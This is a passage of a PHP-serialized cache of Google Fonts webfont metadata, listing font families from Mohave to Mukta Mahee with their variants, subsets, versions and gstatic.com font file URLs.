static.com/s/mohave/v8/7cH0v4ksjJunKqMVAOPIMOeSmiojdkv_HvCQopLSvBk.ttf\";s:3:\"600\";s:84:\"http://fonts.gstatic.com/s/mohave/v8/7cH0v4ksjJunKqMVAOPIMOeSmiojdqf4HvCQopLSvBk.ttf\";s:3:\"700\";s:84:\"http://fonts.gstatic.com/s/mohave/v8/7cH0v4ksjJunKqMVAOPIMOeSmiojdp74HvCQopLSvBk.ttf\";s:9:\"300italic\";s:87:\"http://fonts.gstatic.com/s/mohave/v8/7cH2v4ksjJunKqM_CdE36I75AIQkY7G8qLOaprDXrBlSVw.ttf\";s:6:\"italic\";s:87:\"http://fonts.gstatic.com/s/mohave/v8/7cH2v4ksjJunKqM_CdE36I75AIQkY7G89rOaprDXrBlSVw.ttf\";s:9:\"500italic\";s:87:\"http://fonts.gstatic.com/s/mohave/v8/7cH2v4ksjJunKqM_CdE36I75AIQkY7G8xLOaprDXrBlSVw.ttf\";s:9:\"600italic\";s:87:\"http://fonts.gstatic.com/s/mohave/v8/7cH2v4ksjJunKqM_CdE36I75AIQkY7G8KLSaprDXrBlSVw.ttf\";s:9:\"700italic\";s:87:\"http://fonts.gstatic.com/s/mohave/v8/7cH2v4ksjJunKqM_CdE36I75AIQkY7G8EbSaprDXrBlSVw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:764;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Molengo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/molengo/v16/I_uuMpWeuBzZNBtQbbRQkiCvs5Y.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:765;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Molle\";s:8:\"variants\";a:1:{i:0;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:6:\"italic\";s:68:\"http://fonts.gstatic.com/s/molle/v21/E21n_dL5hOXFhWEsXzgmVydREus.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:766;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Monda\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/monda/v16/TK3tWkYFABsmjvpmNBsLvPdG.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/monda/v16/TK3gWkYFABsmjsLaGz8Dl-tPKo2t.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:767;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Monofett\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/monofett/v22/mFTyWbofw6zc9NtnW43SuRwr0VJ7.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:768;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Monoton\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/monoton/v15/5h1aiZUrOngCibe4fkbBQ2S7FU8.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:769;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Monsieur La Doulaise\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/monsieurladoulaise/v14/_Xmz-GY4rjmCbQfc-aPRaa4pqV340p7EZl5ewkEU4HTy.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:770;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Montaga\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/montaga/v13/H4cnBX2Ml8rCkEO_0gYQ7LO5mqc.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:771;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Montagu Slab\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:114:\"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkDbE3P9Fs7bOSO7.ttf\";s:3:\"200\";s:114:\"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkBbEnP9Fs7bOSO7.ttf\";s:3:\"300\";s:114:\"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkCFEnP9Fs7bOSO7.ttf\";s:7:\"regular\";s:114:\"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkDbEnP9Fs7bOSO7.ttf\";s:3:\"500\";s:114:\"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkDpEnP9Fs7bOSO7.ttf\";s:3:\"600\";s:114:\"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkAFFXP9Fs7bOSO7.ttf\";s:3:\"700\";s:114:\"http://fonts.gstatic.com/s/montaguslab/v6/6qLhKZIQtB_zv0xUaXRDWkY_HXsphdLRZF40vm_jzR2jhk_n3T6ACkA8FXP9Fs7bOSO7.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:772;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"MonteCarlo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/montecarlo/v7/buEzpo6-f9X01GadLA0G0CoV_NxLeiw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:773;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Montez\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/montez/v18/845ZNMk5GoGIX8lm1LDeSd-R_g.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:774;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Montserrat\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:94:\"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Uw-Y3tcoqK5.ttf\";s:3:\"200\";s:94:\"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCvr6Ew-Y3tcoqK5.ttf\";s:3:\"300\";s:94:\"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCs16Ew-Y3tcoqK5.ttf\";s:7:\"regular\";s:94:\"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtr6Ew-Y3tcoqK5.ttf\";s:3:\"500\";s:94:\"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCtZ6Ew-Y3tcoqK5.ttf\";s:3:\"600\";s:94:\"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCu170w-Y3tcoqK5.ttf\";s:3:\"700\";s:94:\"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCuM70w-Y3tcoqK5.ttf\";s:3:\"800\";s:94:\"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCvr70w-Y3tcoqK5.ttf\";s:3:\"900\";s:94:\"http://fonts.gstatic.com/s/montserrat/v25/JTUHjIg1_i6t8kCHKm4532VJOt5-QNFgpCvC70w-Y3tcoqK5.ttf\";s:9:\"100italic\";s:97:\"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq6R8aX9-p7K5ILg.ttf\";s:9:\"200italic\";s:97:\"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jqyR9aX9-p7K5ILg.ttf\";s:9:\"300italic\";s:97:\"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq_p9aX9-p7K5ILg.ttf\";s:6:\"italic\";s:97:\"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq6R9aX9-p7K5ILg.ttf\";s:9:\"500italic\";s:97:\"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq5Z9aX9-p7K5ILg.ttf\";s:9:\"600italic\";s:97:\"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq3p6aX9-p7K5ILg.ttf\";s:9:\"700italic\";s:97:\"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jq0N6aX9-p7K5ILg.ttf\";s:9:\"800italic\";s:97:\"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jqyR6aX9-p7K5ILg.ttf\";s:9:\"900italic\";s:97:\"http://fonts.gstatic.com/s/montserrat/v25/JTUFjIg1_i6t8kCHKm459Wx7xQYXK0vOoz6jqw16aX9-p7K5ILg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:775;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Montserrat Alternates\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:104:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFThWacfw6zH4dthXcyms1lPpC8I_b0juU0xiKfVKphL03l4.ttf\";s:9:\"100italic\";s:107:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTjWacfw6zH4dthXcyms1lPpC8I_b0juU057p-xIJxp1ml4imo.ttf\";s:3:\"200\";s:106:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xJIb1ALZH2mBhkw.ttf\";s:9:\"200italic\";s:108:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p8dAbxD-GVxk3Nd.ttf\";s:3:\"300\";s:106:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xQIX1ALZH2mBhkw.ttf\";s:9:\"300italic\";s:108:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p95ArxD-GVxk3Nd.ttf\";s:7:\"regular\";s:102:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTvWacfw6zH4dthXcyms1lPpC8I_b0juU0J7K3RCJ1b0w.ttf\";s:6:\"italic\";s:104:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFThWacfw6zH4dthXcyms1lPpC8I_b0juU057qfVKphL03l4.ttf\";s:3:\"500\";s:106:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xGIT1ALZH2mBhkw.ttf\";s:9:\"500italic\";s:108:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p8hA7xD-GVxk3Nd.ttf\";s:3:\"600\";s:106:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xNIP1ALZH2mBhkw.ttf\";s:9:\"600italic\";s:108:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p8NBLxD-GVxk3Nd.ttf\";s:3:\"700\";s:106:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xUIL1ALZH2mBhkw.ttf\";s:9:\"700italic\";s:108:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p9pBbxD-GVxk3Nd.ttf\";s:3:\"800\";s:106:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xTIH1ALZH2mBhkw.ttf\";s:9:\"800italic\";s:108:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p91BrxD-GVxk3Nd.ttf\";s:3:\"900\";s:106:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTiWacfw6zH4dthXcyms1lPpC8I_b0juU0xaID1ALZH2mBhkw.ttf\";s:9:\"900italic\";s:108:\"http://fonts.gstatic.com/s/montserratalternates/v17/mFTkWacfw6zH4dthXcyms1lPpC8I_b0juU057p9RB7xD-GVxk3Nd.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:776;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Montserrat Subrayada\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:99:\"http://fonts.gstatic.com/s/montserratsubrayada/v17/U9MD6c-o9H7PgjlTHThBnNHGVUORwteQQE8LYuceqGT-.ttf\";s:3:\"700\";s:103:\"http://fonts.gstatic.com/s/montserratsubrayada/v17/U9MM6c-o9H7PgjlTHThBnNHGVUORwteQQHe3TcMWg3j36Ebz.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:777;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Moo Lah Lah\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/moolahlah/v3/dg4h_p_opKZOA0w1AYcm55wtYQYugjW4.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:778;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Moon Dance\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/moondance/v3/WBLgrEbUbFlYW9ekmGawe2XiKMiokE4.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:779;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Moul\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/moul/v25/nuF2D__FSo_3E-RYiJCy-00.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:780;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Moulpali\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"khmer\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v28\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/moulpali/v28/H4ckBXKMl9HagUWymyY6wr-wg763.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:781;O:8:\"stdClass\":8:{s:6:\"family\";s:22:\"Mountains of Christmas\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:103:\"http://fonts.gstatic.com/s/mountainsofchristmas/v20/3y9w6a4zcCnn5X0FDyrKi2ZRUBIy8uxoUo7ePNamMPNpJpc.ttf\";s:3:\"700\";s:107:\"http://fonts.gstatic.com/s/mountainsofchristmas/v20/3y9z6a4zcCnn5X0FDyrKi2ZRUBIy8uxoUo7eBGqJFPtCOp6IaEA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:782;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Mouse Memoirs\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/mousememoirs/v13/t5tmIRoSNJ-PH0WNNgDYxdSb7TnFrpOHYh4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:783;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Mr Bedfort\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/mrbedfort/v21/MQpR-WCtNZSWAdTMwBicliq0XZe_Iy8.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:784;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Mr Dafoe\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/mrdafoe/v14/lJwE-pIzkS5NXuMMrGiqg7MCxz_C.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:785;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Mr De Haviland\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/mrdehaviland/v14/OpNVnooIhJj96FdB73296ksbOj3C4ULVNTlB.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:786;O:8:\"stdClass\":8:{s:6:\"family\";s:19:\"Mrs Saint Delafield\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/mrssaintdelafield/v13/v6-IGZDIOVXH9xtmTZfRagunqBw5WC62cK4tLsubB2w.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:787;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Mrs Sheppards\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/mrssheppards/v21/PN_2Rfm9snC0XUGoEZhb91ig3vjxynMix4Y.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:788;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Ms Madi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/msmadi/v2/HTxsL2UxNnOji5E1N-DPiI7QAYo.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:789;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Mukta\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:69:\"http://fonts.gstatic.com/s/mukta/v13/iJWHBXyXfDDVXbEOjFma-2HW7ZB_.ttf\";s:3:\"300\";s:69:\"http://fonts.gstatic.com/s/mukta/v13/iJWHBXyXfDDVXbFqj1ma-2HW7ZB_.ttf\";s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/mukta/v13/iJWKBXyXfDDVXYnGp32S0H3f.ttf\";s:3:\"500\";s:69:\"http://fonts.gstatic.com/s/mukta/v13/iJWHBXyXfDDVXbEyjlma-2HW7ZB_.ttf\";s:3:\"600\";s:69:\"http://fonts.gstatic.com/s/mukta/v13/iJWHBXyXfDDVXbEeiVma-2HW7ZB_.ttf\";s:3:\"700\";s:69:\"http://fonts.gstatic.com/s/mukta/v13/iJWHBXyXfDDVXbF6iFma-2HW7ZB_.ttf\";s:3:\"800\";s:69:\"http://fonts.gstatic.com/s/mukta/v13/iJWHBXyXfDDVXbFmi1ma-2HW7ZB_.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:790;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Mukta Mahee\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gurmukhi\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"200\";s:82:\"http://fonts.gstatic.com/s/muktamahee/v15/XRXN3IOIi0hcP8iVU67hA9MFcBoHJndqZCsW.ttf\";s:3:\"300\";s:82:\"http://fonts.gstatic.com/s/muktamahee/v15/XRXN3IOIi0hcP8iVU67hA9NhcxoHJndqZCsW.ttf\";s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/muktamahee/v15/XRXQ3IOIi0hcP8iVU67hA-vNWz4PDWtj.ttf\";s:3:\"500\";s:82:\"http://fonts.gstatic.com/s/muktamahee/v15/XRXN3IOIi0hcP8iVU67hA9M5choHJndqZCsW.ttf\";s:3:\"600\";s:82:\"http://fonts.gstatic.com/s/muktamahee/v15/XRXN3IOIi0hcP8iVU67hA9MVdRoHJndqZCsW.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/muktamahee/v15/XRXN3IOIi0hcP8iVU67hA9NxdBoHJndqZCsW.t